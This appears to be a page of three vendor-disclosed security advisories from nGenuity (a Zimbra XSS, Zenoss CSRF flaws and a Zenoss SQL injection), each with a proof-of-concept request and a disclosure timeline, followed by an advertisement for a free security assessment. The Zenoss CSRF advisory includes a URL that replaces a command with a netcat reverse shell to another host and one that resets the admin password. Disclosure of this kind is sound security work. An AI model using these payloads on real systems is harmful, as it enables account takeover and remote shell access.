Advisory ID: NGENUITY-2010-004 - Zimbra search skin XSS
   Application: Zimbra
        Vendor: Zimbra
Vendor website: http://www.spiceworks.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
         Class: XSS
Authentication: Valid session required

  I. BACKGROUND
     Zimbra [1] is an open-source and commercial messaging and collaboration software
     suite.

 II. DETAILS
     A cross-site script (XSS) vulnerability exists within the classic Zimbra web
     interface. This vulnerability exists due to improper output encoding of the
     skin parameter.

     Example:
     http://example.com/zimbra/h/search?skin=--><script src=""></script><!--&
     mesg=welcome&initial=true&app=

     The vendor states that this vulnerability is addressed in version 5.0.20 and
     6.0.2. "The 5.0.x series of releases was not vulnerable to this issue.  We
     applied the same change in 5.0.20 that went into 6.0.2, but that was just for
     safety.  In 5.0.x other code prohibited this exploit."

III. REFERENCES
     [1] - http://www.zimbra.com

 IV. VENDOR COMMUNICATION
     10.07.2009 - Vulnerability Discovery & Vendor Notification.
     10.08.2009 - Vendor bug filed.
     12.15.2009 - Follow-up to find out fix status.
     12.15.2009 - Vendor Statement that this has been addressed.

The contents of this advisory are copyright (c) nGenuity Information  Security
and may be distributed freely provided that no fee is charged  for this distribution
and proper credit is given.

   Advisory ID: NGENUITY-2010-002 - Zenoss Multiple Admin CSRF
   Application: Zenoss 2.3.3
        Vendor: Zenoss
Vendor website: http://www.zenoss.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)

  I. BACKGROUND
     Zenoss is a commercial and open source systems and network monitoring tool. Much
     of the applications functionality is accessible via a front end web application.

 II. DETAILS
     Multiple CSRF vulnerabilities exist that can allow for arbitrary
     commands to be executed on the Zenoss server as well as reset the Zenoss
     admin password.

     Attack scenario: If an administrator has an active Zenoss
     session and visits one of these links or visits a malicious page that
     contains resources to point to these URL's

     1. Reset user password to a known state Cross-Site Request Forgery CSRF,
     in this case the password is reset to letmein.

http://172.16.28.5:8080/zport/dmd/ZenUsers/admin?defaultAdminLevel:int=1&

        defaultAdminRole=ZenUser&defaultPageSize:int=40&email=&eventConsoleRefresh:
        boolean=True&manage_editUserSettings:method=Save&netMapStartObject=&pager=&
        password=letmein&sndpassword=letmein&zenScreenName=editUserSettings

     2. Change and execute a command CSRF.
     Change the ping command to be a netcat shell out to a remote system. In
     this case an internal system running on port 443

        http://172.16.28.5:8080/zport/dmd/userCommands/ping?command:text=nc -e
        /bin/bash 172.16.28.6 443&commandId=ping&description:text=&
        manage_editUserCommand:method=Save&zenScreenName=userCommandDetail

     Execute the new "ping" command:

http://172.16.28.5:8080/zport/dmd/Devices/devices/localhost/manage_doUserCommand?commandId=ping

III. REFERENCES
     [1] - http://www.zenoss.com

 IV. VENDOR COMMUNICATION
     3.10.2009 - Vulnerability Discovery
     8.21.2009 - Requested status from vendor
     9.29.2009 - Vendor call (Fix pending)

Copyright (c) 2009 nGenuity Information Services, LLC

   Advisory ID: NGENUITY-2010-001 - Zenoss getJSONEventsInfo SQL Injection
   Application: Zenoss 2.3.3
        Vendor: Zenoss
Vendor website: http://www.zenoss.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
           BID: 37802

  I. BACKGROUND
     "Zenoss Core is an award-winning open source IT monitoring product that
     effectively manages the configuration, health and performance of
     networks, servers and applications through a single, integrated
     software package." [1] 

II. DETAILS
    getJSONEventsInfo contains multiple SQL Injection vulnerabilities due to improperly
    sanitized user provided input. The following URL parameters are injectable: severity,
    state, filter, offset, and count.

    Authentication as an admin or regular user is required for successful exploitation.
    Depending on the type of attack, it may also be accomplished via Cross-Site Request
    Forgery (CSRF).

    A proof of concept request might look like this
      /zport/dmd/Events/getJSONEventsInfo?severity=1&state=1&filter=&
      offset=0&count=60 into outfile "/tmp/z"

III. REFERENCES
     [1] - http://www.zenoss.com

 IV. VENDOR COMMUNICATION
     3.10.2009 - Vulnerability Discovery
     8.21.2009 - Requested status from vendor
     9.29.2009 - Vendor call (Fix pending)

     Update 1.21.2010
     This vulnerability was fixed prior to version 2.5.

http://dev.zenoss.org/trac/changeset/15257

Copyright (c) 2009 nGenuity Information Services, LLC

For more detail or if you want to schedule with us please contact Adam Baldwin at 509.396.2075 or info@ngenuity-is.com

What do you get with the free assessment?

• 30 minutes of network and website security assessment by the nGenuity team of security ninjas.
• 30 minutes of discussion / debrief about any security issues identified.
• 20% discount on any IT and security consulting and support services through the remainder of 2009.
• No hassle or obligation to purchase anything. This is not a hard sell, this is a free service we are offering to improve awareness on network / website security.

Follow this link for more information on nGenuity’s security assessments.

I already have an “IT” person / company that handles this type of stuff for me.

Chances are your IT person or company is doing a great job supporting you, but what if that isn’t the case and you just haven’t noticed yet? What if security isn’t their thing? nGenuity already works with a few IT providers to complement the services they provide. There is nothing wrong with getting a second opinion from an expert.

Where do I sign up?

Call us at 509-396-2075 and mash the first number that you hear or email us at info@ngenuity-is.com

Look for the ad (designed by &yet) for this free assessment in the Tri-City Area Journal of Business (page 26.)